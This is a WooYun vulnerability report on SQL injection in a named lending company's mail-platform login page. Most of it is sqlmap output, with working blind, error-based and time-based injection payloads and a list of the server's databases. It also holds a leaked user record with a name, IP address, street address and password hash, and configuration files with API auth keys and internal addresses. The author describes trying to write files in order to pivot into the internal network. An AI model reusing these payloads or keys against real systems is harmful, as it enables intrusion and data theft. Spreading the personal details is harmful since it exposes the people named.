月月贷某站点SQL注入导致部分企业详细信息泄漏（姓名\电话\地址\域名）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161516

漏洞标题：月月贷某站点SQL注入导致部分企业详细信息泄漏（姓名\电话\地址\域名）

漏洞作者：路人甲

提交时间：2015-12-15 15:39

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-15：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

https://mail.yueyuedai.com/mm-ms/?module=base&action=login登陆框存在SQL注入

直接丢进SQLMAP里面跑了一圈

Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=a' RLIKE (SELECT (CASE WHEN (2102=2102) THEN 0x61 ELSE 0x28 END)) AND 'ghiS'='ghiS&password=admin123&captcha=D2C0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=a' AND (SELECT 6368 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(6368=6368,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WdKf'='WdKf&password=admin123&captcha=D2C0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=a' AND (SELECT * FROM (SELECT(SLEEP(5)))mDNX) AND 'krqq'='krqq&password=admin123&captcha=D2C0
---
web application technology: Nginx, PHP 5.3.20
back-end DBMS: MySQL >= 5.0.0
available databases [12]:
[*] cacti
[*] information_schema
[*] mm-mls
[*] mm-ms
[*] mm-ms-old
[*] mm-notice
[*] mm-pool
[*] mm-track
[*] mm-widget
[*] mysql
[*] performance_schema
[*] zxc

发现权限比较高，碰巧遇到了info.php。得到了绝对路径，不过多次尝试写入的时候写入失败了

漏洞证明：

恰巧跑了一下agent_user这个表

发现一个奇葩的账号

| 64       | <blank>                     | NULL    | NULL                        | <blank>         | [email protected]          | <blank>       | 何先生         | 113.90.227.156  | 2014-07-01 09:43:58 | 福建省福州市鼓楼区梅竹路77号         | 61070部队           | $1$TTwc6mfs$v1cPt6eLp9zxuF9ibMp4/0 | 0        | 61070部队

密码没法破解。就查看了下相关的域名总数

提取了几个相关的

利用mysql root权限读取了部分文件，发现部分是内网进行认证的

//邮件服务器配置
$api_mmbs = array();
$api_mmbs[] = array(
	'serverid' => '001',
	'describe' => '计费服务器',
	'function' => array('serv'),
	#'api_path' => 'http://127.0.0.1/api_bs/api.php',
	'api_path' => 'http://127.0.0.1:5000/api',
	#'auth_key' => 'qyQ2NFFm8aDH86m2XMs38jU8wc3d6T',
	'auth_key' => 'oDerVOA0Dfh6qAk5J#5tem12j.eRJd',
);
$api_mmbs[] = array(
	'serverid' => '002',
	'describe' => '回执服务器',
	'function' => array('data'),
	'auth_key' => 'oDerVOA0Dfh6qAk5J#5tem12j.eRJd',
	'api_path' => 'http://192.168.50.27:88/api/api.php',
);
/*
$api_mmbs[] = array(
	'serverid' => '002',
	'describe' => '回执服务器',
	'function' => array('data'),
	'auth_key' => 'oDerVOA0Dfh6qAk5J#5tem12j.eRJd',
	'api_path' => 'http://127.0.0.1/api/api.php',
);
*/
//Web客户端接口配置
$api_webclient = array(
	#'url' => 'http://127.0.0.1/api/api.php?t=webclient',
	'url' => 'http://127.0.0.1:5001/task?',
	'key' => 'oDerVOA0Dfh6qAk5J#5tem12j.eRJd',
);
//无效地址库接口配置
$api_invalid = array(
	#'api_path' => "http://127.0.0.1/api_bs/mongo.php",
	'api_path' => 'http://127.0.0.1:5000/mongo',
	#'auth_key' => 'qyQ2NFFm8aDH86m2XMs38jU8wc3d6T',
	'auth_key' => 'oDerVOA0Dfh6qAk5J#5tem12j.eRJd',
);

数据库连接。(密码已经替换为password)就是没有找到可以写的地方，不然就还可以内网遨游一番了

<?php
//数据库设置
$db_config['default'] = array(
	'hostname'     => '127.0.0.1',
	'username' => 'edm_web',
	'password' => 'password',
	'dbname'   => 'mm-ms',
	'charset'  => 'UTF8',
	'dbtype'   => 'mysql',
);
//用户地址池
$db_config['pool'] = array(
	'hostname'     => '127.0.0.1',
	'username' => 'edm_web',
	'password' => 'password',
	'dbname'   => 'mm-pool',
	'charset'  => 'UTF8',
	'dbtype'   => 'mysql',
);
//跟踪数据库
$db_config['track'] = array(
	'hostname'     => '127.0.0.1',
	'username' => 'edm_web',
	'password' => 'password',
	'dbname'   => 'mm-track',
	'charset'  => 'UTF8',
	'dbtype'   => 'mysql',
);
//邮件列表订阅者数据库
$db_config['subscriber'] = array(
	'hostname'     => '127.0.0.1',
	'username' => 'edm_web',
	'password' => 'password',
	'dbname'   => 'mm-mls',
	'charset'  => 'UTF8',
	'dbtype'   => 'mysql',
);
//小工具数据库
$db_config['widget'] = array(
	'host'     => '127.0.0.1',
	'username' => 'edm_web',
	'password' => 'password',
	'dbname'   => 'mm-widget',
	'charset'  => 'UTF8',
	'dbtype'   => 'mysql',
);

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161516

漏洞标题：月月贷某站点SQL注入导致部分企业详细信息泄漏（姓名\电话\地址\域名）

相关厂商：月月贷

漏洞作者：路人甲

提交时间：2015-12-15 15:39

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161516

漏洞标题：月月贷某站点SQL注入导致部分企业详细信息泄漏（姓名\电话\地址\域名）

相关厂商：月月贷

漏洞作者： 路人甲

提交时间：2015-12-15 15:39

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0161516"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云